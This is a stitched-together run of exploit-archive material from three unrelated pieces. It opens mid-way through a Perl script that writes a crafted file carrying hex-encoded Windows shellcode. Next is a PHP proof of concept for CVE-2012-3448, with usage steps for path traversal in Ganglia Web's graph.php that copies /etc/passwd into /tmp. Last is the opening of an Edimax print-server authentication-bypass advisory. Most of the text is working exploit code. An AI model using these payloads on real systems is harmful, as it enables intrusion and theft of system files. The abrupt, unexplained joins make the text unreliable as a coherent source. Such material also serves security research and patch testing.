x35\x36\x30\x30\x36\x39\x30\x30\x36\x35\x30\x30\x37\x37\x30\x30\x34\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x32\x31\x34\x33\x33\x34\x31\x32\x30\x38\x30\x30\x30\x30\x30\x30\x36\x61\x62\x30\x38\x32\x32\x63\x62\x62\x30\x35\x30\x30\x30\x30\x34\x45\x30\x38\x37\x44\x45\x42\x30\x31\x30\x30\x30\x36\x30\x30\x31\x43\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x36\x30\x30\x30\x31\x35\x36\x30\x41\x30\x30\x30\x30\x30\x31\x45\x46\x43\x44\x41\x42\x30\x30\x30\x30\x30\x35\x30\x30\x39\x38\x35\x44\x36\x35\x30\x31\x30\x37\x30\x30\x30\x30\x30\x30\x30\x38\x30\x30\x30\x30\x38\x30\x30\x35\x30\x30\x30\x30\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x46\x44\x45\x45\x43\x42\x44\x30\x31\x30\x30\x30\x35\x30\x30\x39\x30\x31\x37\x31\x39\x30\x30\x30\x30\x30\x30\x30\x38\x30\x30\x30\x30\x30\x30\x34\x39\x37\x34\x36\x44\x37\x33\x36\x34\x30\x30\x30\x30\x30\x30\x30\x32\x30\x30\x30\x30\x30\x30\x30\x31\x30\x32\x32\x32\x32\x30\x30\x43\x30\x30\x30\x30\x30\x30\x34\x33\x36\x46\x36\x32\x36\x41\x36\x34\x30\x30\x30\x30\x30\x30\x38\x32\x38\x32\x30\x30\x30\x30\x38\x32\x38\x32\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x63\x62\x39\x38\x30\x39\x37\x37\x39\x30\x39\x30\x39\x30\x39\x30\x39\x30\x39\x30\x39\x30\x39\x30\x33\x33\x63\x39\x36\x34\x38\x62\x34\x39\x33\x30\x38\x62\x34\x39\x30\x63\x38\x62\x34\x39\x31\x63\x38\x62\x35\x39\x30\x38\x38\x62\x34\x31\x32\x30\x38\x62\x30\x39\x38\x30\x37\x38\x30\x63\x33\x33\x37\x35\x66\x32\x38\x62\x65\x62\x30\x33\x36\x64\x33\x63\x38\x62\x36\x64\x37\x38\x30\x33\x65\x62\x38\x62\x34\x35\x32\x30\x30\x33\x63\x33\x33\x33\x64\x32\x38\x62\x33\x34\x39\x30\x30\x33\x66\x33\x34\x32\x38\x31\x33\x65\x34\x37\x36\x35\x37\x34\x35\x30\x37\x35\x66\x32\x38\x31\x37\x65\x30\x34\x37\x32\x36\x66\x36\x33\x34\x31\x37\x35\x65\x39\x38\x62\x37\x35\x32\x34\x30\x33\x66\x33\x36\x36\x38\x62\x31\x34\x35\x36\x38\x62\x37\x35\x31\x63\x30\x33\x66\x33\x38\x62\x37\x34\x39\x36\x66\x63\x30\x33\x66\x33\x33\x33\x66\x66\x35\x37\x36\x38\x36\x31\x37\x32\x37\x39\x34\x31\x36\x38\x34\x63\x36\x39\x36\x32\x37\x32\x36\x38\x34\x63\x36\x66\x36\x31\x36\x34\x35\x34\x35\x33\x66\x66\x64\x36\x33\x33\x63\x39\x35\x37\x36\x36\x62\x39\x33\x33\x33\x32\x35\x31\x36\x38\x37\x35\x37\x33\x36\x35\x37\x32\x35\x34\x66\x66\x64\x30\x35\x37\x36\x38\x36\x66\x37\x38\x34\x31\x30\x31\x66\x65\x34\x63\x32\x34\x30\x33\x36\x38\x36\x31\x36\x37\x36\x35\x34\x32\x36\x38\x34\x64\x36\x35\x37\x33\x37\x33\x35\x34\x35\x30\x66\x66\x64\x36\x35\x37\x36\x38\x37\x32\x36\x63\x36\x34\x32\x31\x36\x38\x36\x66\x32\x30\x35\x37\x36\x66\x36\x38\x34\x38\x36\x35\x36\x63\x36\x63\x38\x62\x63\x63\x35\x37\x35\x37\x35\x31\x35\x37\x66\x66\x64\x30\x35\x37\x36\x38\x36\x35\x37\x33\x37\x33\x30\x31\x66\x65\x34\x63\x32\x34\x30\x33\x36\x38\x35\x30\x37\x32\x36\x66\x36\x33\x36\x38\x34\x35\x37\x38\x36\x39\x37\x34\x35\x34\x35\x33\x66\x66\x64\x36\x35\x37\x66\x66\x64\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30".
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30".
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31";
for($i=1;$i<=4212;$i++){
$buffer="$buffer\\x30"; # 4212 X "0"
}
$buffer=$buffer."\x31\x31\x31\x31\x31\x31\x31\x31\x0a\x7d\x7d\x7d"; # EOF = }}}
print FILE $buffer;
close FILE;
<?php
/*
################################################################################
#
# Author : Andrei Costin (andrei theATsign firmware theDOTsign re)
# Desc : CVE-2012-3448 PoC
# Details : This PoC will create a dummy file in the /tmp folder and
# will copy /etc/passwd to /tmp.
# To modify the attack payload, modify the code below.\
# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0
#
################################################################################
1. Assuming that ganglia is installed on the target machine at this path:
/var/www/html/ganglia/
2. Assuming the attacker has minimal access to the target machine and
can write to "/tmp". There are several methods where a remote attacker can
also trigger daemons or other system processes to create files in "/tmp"
whose content is (partially) controlled by the remote attacker.
3. The attacker puts the contents of this PoC file into the file:
/tmp/attack.php
4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1
as:
http://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY
5. Confirm that the PoC created a dummy file in the /tmp folder and copied
/etc/passwd to /tmp.
*/
eval('touch("/tmp/attacker.touch"); copy("/etc/passwd", "/tmp/attacker.passwd");');
die("Triggering CVE-2012-3448 attack.php");
?>
# Title: Edimax PS-1206MF - Web Admin Auth Bypass
# Date: 30.08.15
# Vendor: edimax.com
# Firmware version: 4.8.25
# Author: Smash_
# Contact: smash [at] devilteam.pl
HTTP authorization is not being properly verified while sendind POST requests to .cgi, remote attacker is able to change specific settings or even reset admin password.
